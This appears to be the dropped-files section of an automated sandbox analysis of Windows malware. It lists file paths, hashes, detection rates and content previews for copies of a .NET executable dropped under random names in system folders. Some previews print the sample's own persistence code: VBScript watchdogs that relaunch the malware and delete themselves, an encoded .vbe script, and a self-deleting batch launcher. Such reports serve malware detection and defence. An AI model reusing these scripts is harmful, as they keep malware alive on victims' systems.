C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Videos\330defd625eedf

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	240
Entropy (8bit):	5.7775735008243085
Encrypted:	false
SSDEEP:	6:UOj7jkjGWvE+yb2HI/jeSJsTT18jjM2rxBwE:vrkZJygI/aSJsCjjMwgE
MD5:	F776F5FA818AFE54F01B90A899F03C62
SHA1:	8F33C29BECD07D523EB35529D48D7083A4F72C4E
SHA-256:	C5FCB77A8C5E339510B18E4A83EBDBAFFC36F3B0486740CFA0F98776754FBCBF
SHA-512:	2D55B419BE8B5145ADA0696B79E87F716D14B2F927F74F864026DE5E8390D5CBBA1D53D4F6236ADC996558B2818D2340CE399639FBCDB6C0E018D896F788D6E1
Malicious:	false
Preview:	Z24v6XEHw1LvfHRAK74JUk21BAMgzoxRRaOzgcxizNmlFcYVAqi8Yn3y9Cu5KhSID4eE3cdrJVUH7Rvim0gIFz2ngZzds1YR4ehL8TchM1yDSw0sQLSTAJCNB0idnA9R6CNdtkkTY85OAzUujHMgjERubUKHu94M2gGQjX8qk95BOyMLfx4fxcs2vcBZZdiZEtVesELLIf6jJPgmH8l7EYYaxOfGViRHaf7edsdbmsWSfIsf

C:\Users\Public\Videos\UplbXNLOfTNXjbhPJQLmKdgT.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Registry.exe.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UplbXNLOfTNXjbhPJQLmKdgT.exe.log

Download File

Process:	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WinLatency.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1740
Entropy (8bit):	5.36827240602657
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
MD5:	B28E0CCD25623D173B2EB29F3A99B9DD
SHA1:	070E4C4A7F903505259E41AFDF7873C31F90D591
SHA-256:	3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
SHA-512:	17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LaRHzSijsq.exe.log

Download File

Process:	C:\Users\user\Desktop\LaRHzSijsq.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\0e88ad83-c250-45ca-adc9-aeea84770856.vbs

Download File

Process:	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	716
Entropy (8bit):	5.286616978526258
Encrypted:	false
SSDEEP:	12:9vWdTzyMsRfhMA6KTjMpVEZt1Cxouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VX:9AnyHfCATTjv4OpD/AEmHob/uhEjdxWo
MD5:	C6DD8B4A545FA5483DE665AD77AD98E2
SHA1:	521F30C4C8A0C7B4268063F589D45B646E152EFE
SHA-256:	6CCF4F88F6DBC8714C2C804781E329EDD059B0B02C0903DA25D487F883DA09CB
SHA-512:	5870FE791D5F5E2B58C8C0328C50EFF962CD39E017DA779F904E05CC6ACF3858428AF1266C814432B8C6C90D3F12E7BF69D7962CD453E5A3A0F362F85DD1BDC9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "2872"..mainFilePath = "C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

C:\Users\user\AppData\Local\Temp\1874e204d87ca9f9141be23ebad23e1fefcf2d8c.exe

Download File

Process:	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2lUpU5qejE

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688184
Encrypted:	false
SSDEEP:	3:mcwbjcpY:meY
MD5:	147853C873E39745B06C6CB2D53FF9E1
SHA1:	04F7FCFEFE2E4538946A8F8EB5014909438ED673
SHA-256:	8C87B0A97F0E0FFD74837A3D8C55E459F93080BCCAE8D28E3AA82C59C483FC97
SHA-512:	328B3E4C6BFB54DF2ACDCEDAA9F1A1B3FFEFF9605C9DFBAFEB4A9641E1685D9BB4C7632DD123CFB31A9CDF0A9C08CD68FF06672D0084E9E8EA211039951A9043
Malicious:	false
Preview:	0kOyJnRBJYfJUWBG4og9L6Q0P

C:\Users\user\AppData\Local\Temp\WinSattl\9Jks4Q9248ljrax16iPG1ojfLKPqxh.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	4.077819531114783
Encrypted:	false
SSDEEP:	3:5IxVMGAhn:5Iwn
MD5:	379E341777BE6FF907435C23E8820088
SHA1:	E14DD5B865C6B697C2A76BA49AC90A1B98986BB0
SHA-256:	C63D7EF8BBD2E8FA2C18FC52FBEF8150EA31BD89E0F793A08F60B0468ED50DF6
SHA-512:	DF6551D2719418FE3B1F564D59139CF67E5B3A878A3179DBD6FCA90D699646E18817BBE62CCBA456CBE5D8C67EE9B493ABFC85AFBAF36A9846BF79DBDF9B2738
Malicious:	false
Preview:	"%Temp%\WinSattl\WinLatency.exe"

C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe
File Type:	data
Category:	dropped
Size (bytes):	219
Entropy (8bit):	5.9049084968762715
Encrypted:	false
SSDEEP:	6:Gx0wqK+NkLzWbHE08nZNDd3RL1wQJRQC6O5vK5FReWRs:GxFMCzWLE04d3XBJEOiKWRs
MD5:	7E92CA966C14C0E729731A0AFA60E5C2
SHA1:	AE5C63FA752839A794E46112CD780120F352EE71
SHA-256:	ACD2ACBB0FD9B50B061A8252F85F8E2EBBA9F32A1F74D157B5061E6E7CEED384
SHA-512:	AAB41B66C085DFB53B472BD8EF3B987B667DF6C8F819396AEC44F99CFBB20731F6E90B931EB3D5C2C1EB0D9C7EE0BEC5465536C3397F6F0B90C719DFC694A715
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^wgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v,T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JuP.:2uzqkxUlDOVJ,B3kc}1yc%^%Dm6F+rKM8WN0J\|K5Xt 4mOJBPTS,0lsd.Jj0AAA==^#~@.

C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\db8b1070-5cc6-4c5d-9632-a5481171a28d.vbs

Download File

Process:	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	492
Entropy (8bit):	5.394162669644051
Encrypted:	false
SSDEEP:	12:9vWdDIyRfhMAyjMpVEZt1CqEfkKQo0BMhFiXAp4QCk3:9A3fCAyjv4dffvcMDYAp4QCw
MD5:	190588E0E0B3EB3F4A14AC5969328EA3
SHA1:	64952B955E3DDDBD252461B53CC04914320CA9DB
SHA-256:	18566346174520419865151A4F4882951283E30C56B95A88C81328A6CCE05D2E
SHA-512:	676D65942121A133CDEA4AE6AD20E1FE94936F296D666CB540E444E91AD9F035CCCE044D51809568CABBE25168ECD62B4793F106A8D763CA55EC1F3D0CEDB700
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On Error Resume Next....Dim mainFilePath..Dim backupFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....mainFilePath = "C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe"..backupFilePath = "C:\Users\user\AppData\Local\Temp\1874e204d87ca9f9141be23ebad23e1fefcf2d8c.exe"....Do While True...If Not FSO.FileExists(mainFilePath) Then....WS.Exec(backupFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

Download File

Process:	C:\Users\user\Desktop\LaRHzSijsq.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1210495
Entropy (8bit):	6.4643670650201805
Encrypted:	false
SSDEEP:	24576:U2G/nvxW3Ww0tf2F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr/:UbA30fztfRZsHw+VEcjV
MD5:	24AB440AE1EE72BB5ABB8C40DBC4FF4C
SHA1:	3F2331BCEBB4BDA4A9ECF80F448112C044AF0AA7
SHA-256:	B9F480785E10BA5DFC0CC4975393F93F00DE372E77D667C4BE323C7DA20C6841
SHA-512:	2B48F5CF2622F3DB2010C21DF840B4382B6BFBD3FF83E7F0FE6AC7A3F3374054DF29B77183D8FED10113928FD2F2ABD64A2966F8D714DE983759B5D33ECDC62E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zLSKhC92h1.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	240
Entropy (8bit):	5.206972944430374
Encrypted:	false
SSDEEP:	6:hITg3Nou11r+DEoALLHujUyEZtoCNAdLvKOZG1wkn23fD3dHn:OTg9YDEl6jMZt1CDfb1
MD5:	80800A06CE9F1383B0A3B121440FD665
SHA1:	361C567BC09F9CB59D04C3D8958DAA448A894FB1
SHA-256:	E2ABDA7946CC3FA1EA96C52F061B56C0569D15658A24A740402639083CD67A89
SHA-512:	32262B45B4CE9D0AADC281734CF7C23BFB14448EBE7D37F12B9959ABD4946FEC6098A32A8E20E30136A3C1814AA1AD316441EAA14DFE0779D0BE0BD397D595AF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Program Files\Common Files\microsoft shared\UplbXNLOfTNXjbhPJQLmKdgT.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zLSKhC92h1.bat"

C:\Windows\Provisioning\Cosa\330defd625eedf

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	ASCII text, with very long lines (390), with no line terminators
Category:	dropped
Size (bytes):	390
Entropy (8bit):	5.86721324437093
Encrypted:	false
SSDEEP:	12:V2DeDs3ckKTx6gRNnoR5UVY3Sm/Tq65qLd2go3bGo:VkSyol+R5UVcLq65qIgo3bGo
MD5:	8A5EED8EB3513F4DFBA356A7DF1A1A67
SHA1:	E818F1F7723EFC840C588700E77C2FF3CD6B63B1
SHA-256:	618A92B5FB4BC986647A79D4E4F847231E64E39D5E261A077C331E343A6E122D
SHA-512:	94866B3ACBA086263AA5798C2D3F3DECD2C1D6F0ECB31BD31AF325BC4313D661BF260A4031783E76F98324F982BBAC06484527E7A34CA2B22EAAF935B6C45AD2
Malicious:	false
Preview:	WC4Z1xS1vHk9MJe5mqspcuZDL0fHMhHYjJG898wIK3U0iwCOyFVo2r5mn1OASLoOALZCDg5n3jeiajeYyRTHMcg2OeUIuv09PGzWXALSJruSMXMEWzMA1gBhphyjLx2HtfTTtIBxGB8esOp1SQv5jzHsESrzMmGVzmirE2UNyY40igza26Q5B7i4XkObbLle4mpFp7xZ5iGK4QKhcQ7PVLU2DoTdn3wnxa661uv4J1Ad0Y9HZq8LNWItRwBBoTvBwcWeUOqsfDFdL0BppMD74kZbRMoFstP0F8rYBewLAQqKQpibvVVbPyHLD5MHkl9vxPYMJnnKZ26o4PLmoMTWXylQ0gVGSpkZQ4WBQVSHsLBW2dRxujcXRnX9nIWnSh2uRgX93J

C:\Windows\Provisioning\Cosa\UplbXNLOfTNXjbhPJQLmKdgT.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Tasks\330defd625eedf

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	142
Entropy (8bit):	5.510898578148469
Encrypted:	false
SSDEEP:	3:lpDSQ9IReWSwuajTV+aQ0g54S0DCjWXlcItZBAuXW9bDDkLujbW:lYQ9I3SwuafV+b0jejnDuXW9bDDnjy
MD5:	52E0F37683865795398254843BAE9DC9
SHA1:	AB35BB3D92B9B423D4DF0DA8835447FCA04AA502
SHA-256:	032A5C9CA1C3D119A18F0516334F6387D4691F061913D910DD4FCDFA8078295D
SHA-512:	D8CE29F3ED57B24EA7B8C5907FB53D14F52F89D0822D04456AB8810F7BF161D60F9885265385A291F89708BA3BBABC72F4657E737BD763137459A4660684C013
Malicious:	false
Preview:	cT7r9McqEruysXXMXdJtkLlGY3wydLeQ867bDkDNTxryNAgPtveduQhQr0TFanM2Me0vZ5JwZ6axex3XXgFsrBgrZquMR8wpkymtKu0ymrDxztw475r4ieKL8IWsL6fbKuNpLKNnqRFA7s

C:\Windows\Tasks\UplbXNLOfTNXjbhPJQLmKdgT.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	893440
Entropy (8bit):	6.2298406544945495
Encrypted:	false
SSDEEP:	24576:22F2tfRlmR0V2pbxINcJ++V+SZSzcEPoNBpr:2ztfRZsHw+VEcj
MD5:	B26EA50DE8F1DA57B78E045EC904E19A
SHA1:	8137C1FE0633482DD4C42BF2ABB7C3B042877E38
SHA-256:	78FEE25CC75AFFB005B5CA205328F5E0E44BA153E018FAD0A7720C96940F5B9F
SHA-512:	29B76A3A8CB0435013E46198BAB2755F3DE84473CFC8A8B3D26DD3E2B05EEC0BB1409E9CB43235D4FD6BBE5D30C1978F58ACBA89D9172E575D94262DC11D1FFE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................h...6......~.... ........@.. ....................... ............@.................................0...K.................................................................................... ............... ..H............text....f... ...h.................. ..`.sdata.../.......0...l..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.795593009798117
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXjVfFlVfH6XaNvr1iNvj:Vx993DEUAHa
MD5:	603C9093044E3B125E7E245F4A383422
SHA1:	EA52BC1518CDAA3AD92D04D7BD84E42C157E2F5E
SHA-256:	7169A46B164ED6668F97EE0809EC809ABD9F1D739AD1B0A8D9ACDFFFBDFC4453
SHA-512:	2FD7D2BAD8D3D8F6E0CC08A5B54926D80DDB96B57AB387518E34F9EFA20661AB91BB69F01A4ACA88CB304DFB855E60967550181E80D0847A18672057772A31CC
Malicious:	false
